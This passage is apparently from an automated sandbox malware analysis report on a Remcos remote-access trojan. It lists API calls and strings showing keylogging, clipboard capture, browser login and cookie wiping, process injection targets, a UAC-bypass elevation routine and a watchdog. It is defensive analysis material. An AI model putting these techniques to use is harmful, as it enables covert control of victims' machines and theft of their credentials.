                                                                                              • Part of subcall function 004127D5: RegSetValueExA.KERNEL32(TUF,000000AF,00000000,00000004,00000001,00000004,?,?,?,0040B94C,004660E0,00000001,000000AF,00465554), ref: 004127FE
                                                                                              • Part of subcall function 004127D5: RegCloseKey.ADVAPI32(?,?,?,?,0040B94C,004660E0,00000001,000000AF,00465554), ref: 00412809
                                                                                            • OpenMutexA.KERNEL32(00100000,00000000,00000000), ref: 00410F81
                                                                                            • CreateThread.KERNEL32(00000000,00000000,00411637,00000000,00000000,00000000), ref: 00410FE6
                                                                                              • Part of subcall function 004124B7: RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,?), ref: 004124D7
                                                                                              • Part of subcall function 004124B7: RegQueryValueExA.KERNEL32(?,?,00000000,00000000,00000000,?,004742F8), ref: 004124F5
                                                                                              • Part of subcall function 004124B7: RegCloseKey.KERNEL32(?), ref: 00412500
                                                                                            • CloseHandle.KERNEL32(00000000), ref: 00410F90
                                                                                              • Part of subcall function 0041A686: GetLocalTime.KERNEL32(00000000), ref: 0041A6A0
                                                                                            • OpenProcess.KERNEL32(001FFFFF,00000000,?), ref: 0041125A
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.4568327256.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_6_2_400000_wmplayer.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: CloseOpen$CreateProcessValue$CurrentHandleLocalMutexQueryThreadTime
                                                                                            • String ID: 0DG$Remcos restarted by watchdog!$WDH$Watchdog launch failed!$Watchdog module activated$WinDir$\SysWOW64\$\system32\$fsutil.exe$rmclient.exe$svchost.exe$BG
                                                                                            • API String ID: 65172268-860466531
                                                                                            • Opcode ID: f37c5126c027c7c3e0fa34fe350a0c5b3513135de5084eb22c34a7d5917134fe
                                                                                            • Instruction ID: 2ec41641ff7d981187ed77e29e7d519fc89a207972baa733902a05010441332b
                                                                                            • Opcode Fuzzy Hash: f37c5126c027c7c3e0fa34fe350a0c5b3513135de5084eb22c34a7d5917134fe
                                                                                            • Instruction Fuzzy Hash: 97719E3160420157C614FB32D8579AE77A8AED4718F40053FF582A21F2EF7CAA49869F
                                                                                            Function 0040B335 Relevance: 24.6, APIs: 8, Strings: 6, Instructions: 145fileCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • FindFirstFileA.KERNEL32(00000000,?,00000000,\AppData\Roaming\Mozilla\Firefox\Profiles\), ref: 0040B3B4
                                                                                            • FindClose.KERNEL32(00000000), ref: 0040B3CE
                                                                                            • FindNextFileA.KERNEL32(00000000,?), ref: 0040B4F1
                                                                                            • FindClose.KERNEL32(00000000), ref: 0040B517
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.4568327256.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_6_2_400000_wmplayer.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: Find$CloseFile$FirstNext
                                                                                            • String ID: [Firefox StoredLogins Cleared!]$[Firefox StoredLogins not found]$UserProfile$\AppData\Roaming\Mozilla\Firefox\Profiles\$\key3.db$\logins.json
                                                                                            • API String ID: 1164774033-3681987949
                                                                                            • Opcode ID: aa69fda0ab2c2968648b4e27453ac71b0abe9f6a646c55c959d25f27faa08e90
                                                                                            • Instruction ID: 89bba1744b34cafda07904381260291e44814ca984bf7dbd554ee600cd7873bd
                                                                                            • Opcode Fuzzy Hash: aa69fda0ab2c2968648b4e27453ac71b0abe9f6a646c55c959d25f27faa08e90
                                                                                            • Instruction Fuzzy Hash: 4D512C319042195ADB14FBA1EC96AEE7768EF50318F50007FF805B31E2EF389A45CA9D
                                                                                            Function 0040B53A Relevance: 21.1, APIs: 7, Strings: 5, Instructions: 130fileCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • FindFirstFileA.KERNEL32(00000000,?,00000000,\AppData\Roaming\Mozilla\Firefox\Profiles\), ref: 0040B5B2
                                                                                            • FindClose.KERNEL32(00000000), ref: 0040B5CC
                                                                                            • FindNextFileA.KERNEL32(00000000,?), ref: 0040B68C
                                                                                            • FindClose.KERNEL32(00000000), ref: 0040B6B2
                                                                                            • FindClose.KERNEL32(00000000), ref: 0040B6D1
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.4568327256.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_6_2_400000_wmplayer.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: Find$Close$File$FirstNext
                                                                                            • String ID: [Firefox Cookies not found]$[Firefox cookies found, cleared!]$UserProfile$\AppData\Roaming\Mozilla\Firefox\Profiles\$\cookies.sqlite
                                                                                            • API String ID: 3527384056-432212279
                                                                                            • Opcode ID: ad23fcc7a9de36bb25068f0e0c6289ab2036f9b35d1963064f7033f3828fe230
                                                                                            • Instruction ID: 41d59f58487c11b5b23c2ebc8e3123b77d6604a8f5f59a85184e8f88ff1ca84c
                                                                                            • Opcode Fuzzy Hash: ad23fcc7a9de36bb25068f0e0c6289ab2036f9b35d1963064f7033f3828fe230
                                                                                            • Instruction Fuzzy Hash: 65413A319042196ACB14F7A1EC569EE7768EE21318F50017FF801B31E2EF399A458A9E
                                                                                            Function 0040E219 Relevance: 19.5, APIs: 6, Strings: 5, Instructions: 212processCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • GetModuleFileNameW.KERNEL32(00000000,?,00000104,00000000,?,?,00474358), ref: 0040E233
                                                                                            • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,?,00474358), ref: 0040E25E
                                                                                            • Process32FirstW.KERNEL32(00000000,0000022C), ref: 0040E27A
                                                                                            • Process32NextW.KERNEL32(00000000,0000022C), ref: 0040E2FD
                                                                                            • CloseHandle.KERNEL32(00000000,?,?,00474358), ref: 0040E30C
                                                                                              • Part of subcall function 004127D5: RegCreateKeyA.ADVAPI32(80000001,00000000,TUF), ref: 004127E3
                                                                                              • Part of subcall function 004127D5: RegSetValueExA.KERNEL32(TUF,000000AF,00000000,00000004,00000001,00000004,?,?,?,0040B94C,004660E0,00000001,000000AF,00465554), ref: 004127FE
                                                                                              • Part of subcall function 004127D5: RegCloseKey.ADVAPI32(?,?,?,?,0040B94C,004660E0,00000001,000000AF,00465554), ref: 00412809
                                                                                            • CloseHandle.KERNEL32(00000000,?,?,00474358), ref: 0040E371
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.4568327256.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_6_2_400000_wmplayer.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: Close$CreateHandleProcess32$FileFirstModuleNameNextSnapshotToolhelp32Value
                                                                                            • String ID: C:\Program Files(x86)\Internet Explorer\$Inj$ieinstal.exe$ielowutil.exe$BG
                                                                                            • API String ID: 726551946-3025026198
                                                                                            • Opcode ID: 6265d7186e0de0a30c9918c1bfd1a64db60bd3c3b533d39b749380a52cbb14bd
                                                                                            • Instruction ID: ae31f71cb8b9f969ca9e83e5ca698076ed3bac053ed440982de07d1dc4d90588
                                                                                            • Opcode Fuzzy Hash: 6265d7186e0de0a30c9918c1bfd1a64db60bd3c3b533d39b749380a52cbb14bd
                                                                                            • Instruction Fuzzy Hash: ED7172311083019BC714FB61D8519EF77A5BF91358F400D3EF986631E2EF38A959CA9A
                                                                                            Function 004159C6 Relevance: 18.1, APIs: 12, Instructions: 80clipboardmemoryCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • OpenClipboard.USER32 ref: 004159C7
                                                                                            • EmptyClipboard.USER32 ref: 004159D5
                                                                                            • GlobalAlloc.KERNEL32(00002000,-00000002), ref: 004159F5
                                                                                            • GlobalLock.KERNEL32(00000000), ref: 004159FE
                                                                                            • GlobalUnlock.KERNEL32(00000000), ref: 00415A34
                                                                                            • SetClipboardData.USER32(0000000D,00000000), ref: 00415A3D
                                                                                            • CloseClipboard.USER32 ref: 00415A5A
                                                                                            • OpenClipboard.USER32 ref: 00415A61
                                                                                            • GetClipboardData.USER32(0000000D), ref: 00415A71
                                                                                            • GlobalLock.KERNEL32(00000000), ref: 00415A7A
                                                                                            • GlobalUnlock.KERNEL32(00000000), ref: 00415A83
                                                                                            • CloseClipboard.USER32 ref: 00415A89
                                                                                              • Part of subcall function 00404468: send.WS2_32(00000270,00000000,00000000,00000000), ref: 004044FD
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.4568327256.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_6_2_400000_wmplayer.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: Clipboard$Global$CloseDataLockOpenUnlock$AllocEmptysend
                                                                                            • String ID:
                                                                                            • API String ID: 3520204547-0
                                                                                            • Opcode ID: 3815b41c085adabec7ca1f83a0a0d0cb9dde1b7777f489e93b9f6db5ca241520
                                                                                            • Instruction ID: b8e523df9fc7c7245f85f50a48877f09888e29e8b5459684195c928b546a98bf
                                                                                            • Opcode Fuzzy Hash: 3815b41c085adabec7ca1f83a0a0d0cb9dde1b7777f489e93b9f6db5ca241520
                                                                                            • Instruction Fuzzy Hash: E02183712043009BC714BBB1EC5AAAE76A9AF80752F00453EFD06961E2EF38C845D66A
                                                                                            Function 00418754 Relevance: 15.9, APIs: 1, Strings: 8, Instructions: 197COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.4568327256.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_6_2_400000_wmplayer.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: 0$1$2$3$4$5$6$7
                                                                                            • API String ID: 0-3177665633
                                                                                            • Opcode ID: 9b02e51a1cc6672d7d2f4342b27c01cb84a2fdb077451789e1e817f40a25d538
                                                                                            • Instruction ID: 2879f211a781d1662389055333b9a248a4bc7621c6500268a6892da51c348380
                                                                                            • Opcode Fuzzy Hash: 9b02e51a1cc6672d7d2f4342b27c01cb84a2fdb077451789e1e817f40a25d538
                                                                                            • Instruction Fuzzy Hash: CC61A370508301AEDB00EF21D862FEA77E4AF85754F40485EFA91672E1DF789A48C797
                                                                                            Function 00409B10 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 108keyboardthreadCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • GetForegroundWindow.USER32(?,?,004740F8), ref: 00409B3F
                                                                                            • GetWindowThreadProcessId.USER32(00000000,?), ref: 00409B4B
                                                                                            • GetKeyboardLayout.USER32(00000000), ref: 00409B52
                                                                                            • GetKeyState.USER32(00000010), ref: 00409B5C
                                                                                            • GetKeyboardState.USER32(?,?,004740F8), ref: 00409B67
                                                                                            • ToUnicodeEx.USER32(0047414C,00000000,?,?,00000010,00000000,00000000), ref: 00409B8A
                                                                                            • ToUnicodeEx.USER32(?,?,00000010,00000000,00000000), ref: 00409BE3
                                                                                            • ToUnicodeEx.USER32(0047414C,?,?,?,00000010,00000000,00000000), ref: 00409C1C
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.4568327256.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_6_2_400000_wmplayer.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: Unicode$KeyboardStateWindow$ForegroundLayoutProcessThread
                                                                                            • String ID: 8[G
                                                                                            • API String ID: 1888522110-1691237782
                                                                                            • Opcode ID: 925a5eb4e75251b1def6021025d6fe2bb9c2de734200d7c4e5adce8016dcfecb
                                                                                            • Instruction ID: f24a8317de74a0bbad47f265c67a45df51816e9018bfad09e00086f3728f1c27
                                                                                            • Opcode Fuzzy Hash: 925a5eb4e75251b1def6021025d6fe2bb9c2de734200d7c4e5adce8016dcfecb
                                                                                            • Instruction Fuzzy Hash: EE318172508309AFD700DF90DC85FDBB7ECEB48715F00083ABA45961A1D6B5E948DB96
                                                                                            Function 00406764 Relevance: 15.8, APIs: 2, Strings: 7, Instructions: 55COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • _wcslen.LIBCMT ref: 00406788
                                                                                            • CoGetObject.OLE32(?,00000024,004659B0,00000000), ref: 004067E9
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.4568327256.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_6_2_400000_wmplayer.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: Object_wcslen
                                                                                            • String ID: $$Elevation:Administrator!new:$[+] CoGetObject$[+] CoGetObject SUCCESS$[+] ucmAllocateElevatedObject$[-] CoGetObject FAILURE${3E5FC7F9-9A51-4367-9063-A120244FBEC7}
                                                                                            • API String ID: 240030777-3166923314
                                                                                            • Opcode ID: f680b05b7da9254b8b2e62aef58334289a0f3b659c75efd963e3361adaa2c028
                                                                                            • Instruction ID: dba8c49f7cecafb8ed31af17d29d910bb03d3c12ecd117c8e18c4d6c9c114880
                                                                                            • Opcode Fuzzy Hash: f680b05b7da9254b8b2e62aef58334289a0f3b659c75efd963e3361adaa2c028
                                                                                            • Instruction Fuzzy Hash: 811170B2901118AEDB10FAA5884AA9EB7BCDB48714F55007FE905F3281E7789A148A7D
                                                                                            Function 004198C2 Relevance: 15.2, APIs: 10, Instructions: 228serviceCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • OpenSCManagerA.ADVAPI32(00000000,00000000,00000004,004748F8), ref: 004198D8
                                                                                            • EnumServicesStatusW.ADVAPI32(00000000,0000003B,00000003,?,00000000,?,?,?), ref: 00419927
                                                                                            • GetLastError.KERNEL32 ref: 00419935
                                                                                            • EnumServicesStatusW.ADVAPI32(00000000,0000003B,00000003,00000000,?,?,?,?), ref: 0041996D
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.4568327256.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_6_2_400000_wmplayer.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: EnumServicesStatus$ErrorLastManagerOpen
                                                                                            • String ID:
                                                                                            • API String ID: 3587775597-0
                                                                                            • Opcode ID: 7cf647704d9da6e3b27b6f932af26f9fb806ddb2be27768a2356daea2e115d5b
                                                                                            • Instruction ID: 5304d2aa3016a1bb8b693e548c532b43deb082133906afc562c92feca393f19d
                                                                                            • Opcode Fuzzy Hash: 7cf647704d9da6e3b27b6f932af26f9fb806ddb2be27768a2356daea2e115d5b
                                                                                            • Instruction Fuzzy Hash: 37812F711083049BC614FB21DC959AFB7A8BF94718F50493EF582521E2EF78AA05CB9A
                                                                                            Function 004513B7 Relevance: 14.2, APIs: 5, Strings: 3, Instructions: 188COMMONLIBRARYCODE
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                              • Part of subcall function 00446EBF: GetLastError.KERNEL32(?,?,0043931C,?,00000000,?,0043B955,00000000,00000000), ref: 00446EC3
                                                                                              • Part of subcall function 00446EBF: _free.LIBCMT ref: 00446EF6
                                                                                              • Part of subcall function 00446EBF: SetLastError.KERNEL32(00000000,00000000,00000000), ref: 00446F37
                                                                                              • Part of subcall function 00446EBF: _abort.LIBCMT ref: 00446F3D
                                                                                              • Part of subcall function 00446EBF: _free.LIBCMT ref: 00446F1E
                                                                                              • Part of subcall function 00446EBF: SetLastError.KERNEL32(00000000,00000000,00000000), ref: 00446F2B
                                                                                            • GetUserDefaultLCID.KERNEL32(?,?,?), ref: 004514C3
                                                                                            • IsValidCodePage.KERNEL32(00000000), ref: 0045151E
                                                                                            • IsValidLocale.KERNEL32(?,00000001), ref: 0045152D
                                                                                            • GetLocaleInfoW.KERNEL32(?,00001001,<D,00000040,?,?,00000055,00000000,?,?,00000055,00000000), ref: 00451575
                                                                                            • GetLocaleInfoW.KERNEL32(?,00001002,00000000,00000040), ref: 00451594
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.4568327256.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_6_2_400000_wmplayer.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: ErrorLastLocale$InfoValid_free$CodeDefaultPageUser_abort
                                                                                            • String ID: <D$<D$<D
                                                                                            • API String ID: 745075371-3495170934
                                                                                            • Opcode ID: 5c8e94395c66df2641350def7a129c2a5847567c9c00908226c609ff7e549d11
                                                                                            • Instruction ID: fdda48fcf8ef828b158f806230e01f9d82b9b72a6df542884d0e4dc3e0683d2c
                                                                                            • Opcode Fuzzy Hash: 5c8e94395c66df2641350def7a129c2a5847567c9c00908226c609ff7e549d11
                                                                                            • Instruction Fuzzy Hash: 5A51D571900205ABEF10EFA5CC40BBF73B8AF05702F14056BFD11EB262E7789A488769
                                                                                            Function 0041B42F Relevance: 13.6, APIs: 9, Instructions: 105fileCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,?,004742E0,004742F8), ref: 0041B489
                                                                                            • FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,004742E0,004742F8), ref: 0041B4BB
                                                                                            • SetFileAttributesW.KERNEL32(?,00000080,?,?,?,?,?,?,004742E0,004742F8), ref: 0041B529
                                                                                            • DeleteFileW.KERNEL32(?,?,?,?,?,?,?,004742E0,004742F8), ref: 0041B536
                                                                                              • Part of subcall function 0041B42F: RemoveDirectoryW.KERNEL32(?,?,?,?,?,?,?,004742E0,004742F8), ref: 0041B50C
                                                                                            • FindClose.KERNEL32(00000000,?,?,?,?,?,?,004742E0,004742F8), ref: 0041B561
                                                                                            • RemoveDirectoryW.KERNEL32(00000000,?,?,?,?,?,?,004742E0,004742F8), ref: 0041B568
                                                                                            • GetLastError.KERNEL32(?,?,?,?,?,?,004742E0,004742F8), ref: 0041B570
                                                                                            • FindClose.KERNEL32(00000000,?,?,?,?,?,?,004742E0,004742F8), ref: 0041B583
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.4568327256.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_6_2_400000_wmplayer.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: FileFind$CloseDirectoryRemove$AttributesDeleteErrorFirstLastNext
                                                                                            • String ID:
                                                                                            • API String ID: 2341273852-0
                                                                                            • Opcode ID: e3c00313fe9feb441b7390d1c72d337a5a5a4ab260ce0f05f37d8840b2d05d0a
                                                                                            • Instruction ID: e81c2b0307560c21eb772b723951cbad4d8c7a866ea933437d0d5d39764c0eb1
                                                                                            • Opcode Fuzzy Hash: e3c00313fe9feb441b7390d1c72d337a5a5a4ab260ce0f05f37d8840b2d05d0a
                                                                                            • Instruction Fuzzy Hash: 0031627184921CAACB20D7B1AC89ADA77BCAF04309F4405EBF505D3181EB799AC5CE69
                                                                                            Function 00418C69 Relevance: 12.5, APIs: 2, Strings: 5, Instructions: 245fileCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • FindFirstFileW.KERNEL32(00000000,?), ref: 00418EBF
                                                                                            • FindNextFileW.KERNEL32(00000000,?,?), ref: 00418F8B
                                                                                              • Part of subcall function 0041B61A: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,00409F65), ref: 0041B633
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.4568327256.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_6_2_400000_wmplayer.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: File$Find$CreateFirstNext
                                                                                            • String ID: @CG$XCG$`HG$`HG$>G
                                                                                            • API String ID: 341183262-3780268858
                                                                                            • Opcode ID: 738dad69a2902c3cb8e23e4ae6d5f3fee726f81d79e1f073f619bdb7a6a033cf
                                                                                            • Instruction ID: 861c71bda04042c44626cba1538e35c757a91b728f0af2478fb4c1063bb13cc5
                                                                                            • Opcode Fuzzy Hash: 738dad69a2902c3cb8e23e4ae6d5f3fee726f81d79e1f073f619bdb7a6a033cf
                                                                                            • Instruction Fuzzy Hash: B08141315042405BC314FB62C892EEFB3A5AFD1718F50493FF946671E2EF389A49C69A
                                                                                            Function 00412F45 Relevance: 10.9, APIs: 4, Strings: 2, Instructions: 391registrylibraryloaderCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • RegCreateKeyExW.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?,?,00000000,00000001), ref: 0041301A
                                                                                            • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,00000000,00000001), ref: 00413026
                                                                                              • Part of subcall function 00404468: send.WS2_32(00000270,00000000,00000000,00000000), ref: 004044FD
                                                                                            • LoadLibraryA.KERNEL32(Shlwapi.dll,SHDeleteKeyW,00000000,00000001), ref: 004131ED
                                                                                            • GetProcAddress.KERNEL32(00000000), ref: 004131F4
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.4568327256.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_6_2_400000_wmplayer.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: AddressCloseCreateLibraryLoadProcsend
                                                                                            • String ID: SHDeleteKeyW$Shlwapi.dll
                                                                                            • API String ID: 2127411465-314212984
                                                                                            • Opcode ID: 6769e8cc64d9111f16b8eee669ba727fa60eebc73dca31ca9d59c0e38e5964c8
                                                                                            • Instruction ID: cc67afc49b78d61a2372e1362dfc4f5d4a672f2d1b5b468e2109e7b1f18a6fb5
                                                                                            • Opcode Fuzzy Hash: 6769e8cc64d9111f16b8eee669ba727fa60eebc73dca31ca9d59c0e38e5964c8
                                                                                            • Instruction Fuzzy Hash: 4FB1B671A043006BC614BA76CC979BE76989F94718F40063FF946B31E2EF7C9A4486DB
                                                                                            Function 0040B21B Relevance: 10.5, APIs: 2, Strings: 4, Instructions: 48fileCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • DeleteFileA.KERNEL32(00000000,\AppData\Local\Google\Chrome\User Data\Default\Login Data), ref: 0040B257
                                                                                            • GetLastError.KERNEL32 ref: 0040B261
                                                                                            Strings
                                                                                            • [Chrome StoredLogins not found], xrefs: 0040B27B
                                                                                            • UserProfile, xrefs: 0040B227
                                                                                            • \AppData\Local\Google\Chrome\User Data\Default\Login Data, xrefs: 0040B222
                                                                                            • [Chrome StoredLogins found, cleared!], xrefs: 0040B287
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.4568327256.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_6_2_400000_wmplayer.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: DeleteErrorFileLast
                                                                                            • String ID: [Chrome StoredLogins found, cleared!]$[Chrome StoredLogins not found]$UserProfile$\AppData\Local\Google\Chrome\User Data\Default\Login Data
                                                                                            • API String ID: 2018770650-1062637481
                                                                                            • Opcode ID: 4bf0afd112dcaa7b01b7bef1570a104e6056d77a39d62cd62e866e491b3392bc
                                                                                            • Instruction ID: 236ee74dc97b4bdf00ef4875347123a6b81b21ae8e03a402b83ae8c28ff1bd46
                                                                                            • Opcode Fuzzy Hash: 4bf0afd112dcaa7b01b7bef1570a104e6056d77a39d62cd62e866e491b3392bc
                                                                                            • Instruction Fuzzy Hash: 3001A23168410597CA0477B5ED6F8AE3624E921704F50017FF802731E2FF3A9A0586DE
                                                                                            Function 00416AB7 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 32COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • GetCurrentProcess.KERNEL32(00000028,?), ref: 00416AC4
                                                                                            • OpenProcessToken.ADVAPI32(00000000), ref: 00416ACB
                                                                                            • LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00416ADD
                                                                                            • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 00416AFC
                                                                                            • GetLastError.KERNEL32 ref: 00416B02
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.4568327256.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_6_2_400000_wmplayer.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: ProcessToken$AdjustCurrentErrorLastLookupOpenPrivilegePrivilegesValue
                                                                                            • String ID: SeShutdownPrivilege
                                                                                            • API String ID: 3534403312-3733053543
                                                                                            • Opcode ID: e04eb0b34037921419aad719b93aaa051d7dc20f4e189cf25d4eb9764effedfd
